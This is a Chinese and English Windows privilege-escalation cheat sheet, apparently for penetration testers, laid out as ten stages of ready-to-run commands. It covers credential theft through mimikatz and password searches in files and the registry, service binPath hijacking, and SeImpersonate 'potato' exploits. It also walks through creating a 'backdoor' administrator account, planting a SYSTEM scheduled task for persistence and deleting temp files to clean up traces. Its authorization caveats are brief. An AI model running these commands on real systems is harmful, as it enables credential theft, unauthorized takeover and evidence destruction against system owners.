Windows权限提升方法
使用说明:逐项执行命令,记录输出以分析提升路径。若需进一步工具(如PowerUp.ps1),可在PowerShell中加载执行。建议在测试环境中操作,避免生产系统风险。
🧭 一、信息收集阶段(Information Gathering)
whoami → 查看当前用户名和权限级别。
whoami /priv → 列出当前用户的特权(如 SeImpersonatePrivilege)。
hostname → 获取主机名以识别目标系统。
systeminfo → 查看操作系统版本、补丁与体系结构。
wmic qfe get Caption,Description,HotFixID,InstalledOn → 枚举已安装补丁,寻找未修复 CVE 线索。
set → 打印环境变量(如 TEMP、PATH、USERNAME 等)。
echo %USERNAME% && echo %USERDOMAIN% → 获取当前用户与域信息。
net users → 枚举本地用户账户。
net localgroup administrators → 列出本地管理员成员。
ipconfig /all → 网络接口、DNS 与网关信息。
route print → 路由表以识别潜在跳板/网段。
netstat -ano → 查看监听端口及对应 PID。
tasklist /svc → 列出运行进程及其服务映射。
wmic service list brief → 快速枚举服务状态与启动账户。
reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → 查找开机自启项与可被滥用的路径。
⚙️ 二、凭据收集(Credential Harvesting)
cmdkey /list → 查看系统保存的凭据条目。
runas /savecred /user:Administrator cmd.exe → 测试是否可利用已保存凭据(若有的话)。
type %APPDATA%\\Microsoft\\Credentials\\* → 检查可能的凭据存储文件。
findstr /si password *.txt *.ini *.config → 在文件中搜索明文密码痕迹。
reg query HKLM /f password /t REG_SZ /s → 在注册表中搜索明文密码字段。
mimikatz.exe (sekurlsa::logonpasswords) → 从 LSASS 提取明文密码/哈希/票据(仅在授权范围内)。
🧱 三、服务与配置漏洞(Service Misconfiguration)
sc qc <service_name> → 查看服务二进制路径、启动账户与配置。
icacls "C:\\path\\to\\service.exe" → 检查服务可执行文件的文件权限写入情况。
sc config <service_name> binPath= "C:\\evil.exe" → 修改服务执行路径(需权限,常用于持久化)。
accesschk.exe -uws "Everyone" "C:\\Program Files\\..." → 检查可写目录与服务文件夹权限。
wmic service get name,startname,pathname → 批量列出服务及其启动主体与路径。
🧩 四、自动运行与计划任务(Autoruns / Scheduled Tasks)
schtasks /query /fo LIST /v → 枚举计划任务与调用命令。
icacls "C:\\path\\to\\task.exe" → 检查计划任务所调用程序的可修改性。
reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → 用户级自启项枚举。
wmic startup get caption,command → 查看自动启动项与对应命令。
🧨 五、提权特权(Privilege Escalation Primitives)
whoami /priv → 确认是否存在高危特权(SeImpersonate, SeAssignPrimaryToken 等)。
PrintSpoofer.exe -i -c cmd → 利用 SeImpersonatePrivilege(若存在)尝试提权。
JuicyPotato.exe -t * -p cmd.exe -l 1337 → 通过 RPC/COM 提权(针对老系统/不当配置)。
GodPotato.exe -cmd "cmd.exe" → 新版系统可用的提权尝试(视环境而定)。
🧰 六、软件漏洞(Software Exploitation)
wmic product get name,version → 列出已安装程序与版本以对照漏洞库。
dir "C:\\Program Files" → 人工识别可能不安全的第三方软件。
findstr /si "install" *.log *.txt → 在安装日志中查找泄露的凭据或路径信息。
使用 CVE/ExploitDB/厂商公告 进行版本-漏洞匹配 → 将已知漏洞转化为可执行利用链。
🗝️ 七、注册表与权限问题(Registry Abuse)
reg query HKLM\\System\\CurrentControlSet\\Services → 查找可被修改的服务注册表项。
icacls C:\\Windows\\System32 → 检查关键系统目录的权限异常。
reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System → 检查 UAC / 策略配置。
reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon → 检查 AutoAdminLogon 等自动登录配置。
🕵️ 八、令牌与进程劫持(Token & Process Hijacking)
whoami /groups → 查看当前用户所属组与可用令牌。
tasklist /fi "username eq SYSTEM" → 查找 SYSTEM 级进程以评估令牌偷取机会。
psexec.exe -s cmd.exe → 使用 PsTools 在本机以 SYSTEM 权限运行命令(需可执行权限)。
使用 Process Explorer 进行可视化令牌/句柄分析 → 查找可借用的进程令牌。
🧿 九、提权自动化工具(Automation Tools)
winPEASx64.exe → 自动化枚举潜在提权向量与 misconfig。
Seatbelt.exe → 快速收集系统安全与配置信息。
PowerUp.ps1 → PowerShell 脚本化的提权检查。
SharpUp.exe → C# 版提权检查,适合红队/内网场景。
PrivescCheck.ps1 → 全面 PowerShell 提权扫描。
🔥 十、持久化与清理(Persistence & Cleanup)
net user backdoor P@ssw0rd /add → 创建备用用户(注意合规与授权)。
net localgroup administrators backdoor /add → 将后门用户加入管理员组。
schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\\proof.txt" /sc onlogon /ru SYSTEM → 以 SYSTEM 权限创建持久计划任务。
del /f /q C:\\Windows\\Temp\\* → 清理痕迹(谨慎操作,记录审计行为)。
Methods for Elevating Privileges on Windows
Instructions: Execute the commands one by one and record the output to analyze the path of privilege escalation. If additional tools (such as PowerUp.ps1) are needed, they can be loaded and executed in PowerShell. It is recommended to perform these operations in a test environment to avoid risks to the production system.
🧭 Step 1: Information Gathering
whoami → Displays the current username and privilege level.
whoami /priv → Lists the privileges of the current user (e.g., SeImpersonatePrivilege).
hostname → Retrieves the hostname to identify the target system.
systeminfo → Displays the operating system version, patches, and architecture.
wmic qfe get Caption,Description,HotFixID,InstalledOn → Enumerates installed patches to look for unpatched CVE (Common Vulnerabilities and Exposures).
set → Prints environment variables (e.g., TEMP, PATH, USERNAME, etc.).
echo %USERNAME% && echo %USERDOMAIN% → Displays the current user and domain information.
net users → Lists local user accounts.
net localgroup administrators → Lists members of the local administrators group.
ipconfig /all → Displays network interface, DNS, and gateway information.
route print → Displays the route table to identify potential jump servers/IP ranges.
netstat -ano → Displays listening ports and their corresponding PID (Process IDs).
tasklist /svc → Lists running processes and their service associations.
wmic service list brief → Quickly enumerates service status and startup accounts.
reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → Searches for auto-start items and exploitable paths at startup.
⚙️ Step 2: Credential Harvesting
cmdkey /list → Displays the credentials saved by the system.
runas /savecred /user:Administrator cmd.exe → Tests whether saved credentials can be exploited (if any).
type %APPDATA%\\Microsoft\\Credentials\\* → Checks for possible credential storage files.
findstr /si password *.txt *.ini *.config → Searches for plain-text passwords in files.
reg query HKLM /f password /t REG_SZ /s → Searches for plain-text password fields in the registry.
mimikatz.exe (sekurlsa::logonpasswords) → Extracts plain-text passwords, hashes, and tickets from LSASS (only within authorized scope).
🧱 Step 3: Service Misconfiguration
sc qc <service_name> → Displays the service binary path, startup account, and configuration.
icacls "C:\\path\\to\\service.exe" → Checks the file permissions of the service executable file.
sc config <service_name> binPath= "C:\\evil.exe" → Modifies the service execution path (requires privileges, often used for persistence).
accesschk.exe -uws "Everyone" "C:\\Program Files\\..." → Checks the writable permissions of directories and service folders.
wmic service get name,startname,pathname → Lists services along with their startup accounts and paths in bulk.
🧩 Step 4: Autoruns and Scheduled Tasks
schtasks /query /fo LIST /v → Enumerates scheduled tasks and their associated commands.
icacls "C:\\path\\to\\task.exe" → Checks the modifiability of programs called by scheduled tasks.
reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → Lists user-level auto-start items.
wmic startup get caption,command → Displays auto-start items and their corresponding commands.
🧨 V. Privilege Escalation Primitives
whoami /priv → Verify the presence of high-risk privileges such as SeImpersonate and SeAssignPrimaryToken.
PrintSpoofer.exe -i -c cmd → Attempt privilege escalation using SeImpersonatePrivilege (if available).
JuicyPotato.exe -t * -p cmd.exe -l 1337 → Privilege escalation via RPC/COM (for older systems or improper configurations).
GodPotato.exe -cmd "cmd.exe" → Privilege escalation attempt available on newer systems (depending on the environment).
🧰 VI. Software Exploitation
wmic product get name,version → List installed programs and their versions for comparison with vulnerability databases.
dir "C:\\Program Files" → Manually identify potentially insecure third-party software.
findstr /si "install" *.log *.txt → Search installation logs for leaked credentials or path information.
Use CVE/ExploitDB/vendor announcements to match versions with vulnerabilities → Convert known vulnerabilities into executable exploits.
🗝️ VII. Registry Abuse
reg query HKLM\\System\\CurrentControlSet\\Services → Identify registry entries of services that can be modified.
icacls C:\\Windows\\System32 → Check for abnormal permissions in critical system directories.
reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System → Verify UAC (User Account Control) and policy configurations.
reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon → Check auto-logon settings such as AutoAdminLogon.
🕵️ VIII. Token & Process Hijacking
whoami /groups → View the user’s groups and available tokens.
tasklist /fi "username eq SYSTEM" → Search for SYSTEM-level processes to assess token theft opportunities.
psexec.exe -s cmd.exe → Execute commands locally with SYSTEM privileges using PsTools (requires execution permission).
Use Process Explorer for visual analysis of tokens and handles → Identify process tokens that can be exploited.
🧿 IX. Automation Tools for Privilege Escalation
winPEASx64.exe → Automate the detection of potential privilege escalation vectors and misconfigurations.
Seatbelt.exe → Quickly collect system security and configuration information.
PowerUp.ps1 → PowerShell script for privilege escalation checks.
SharpUp.exe → C#-based privilege escalation tool, suitable for red teams and internal networks.
`PrivescCheck.ps1** — Comprehensive PowerShell-based privilege escalation scan.
🔥 X. Persistence & Cleanup
net user backdoor P@ssw0rd /add → Create a backup user (consider compliance and authorization).
net localgroup administrators backdoor /add → Add the backdoor user to the administrators group.
schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\\proof.txt" /sc onlogon /ru SYSTEM → Create a persistent scheduled task with SYSTEM privileges.
del /f /q C:\\Windows\\Temp\\* Clean up traces (operate with caution and log audit activities).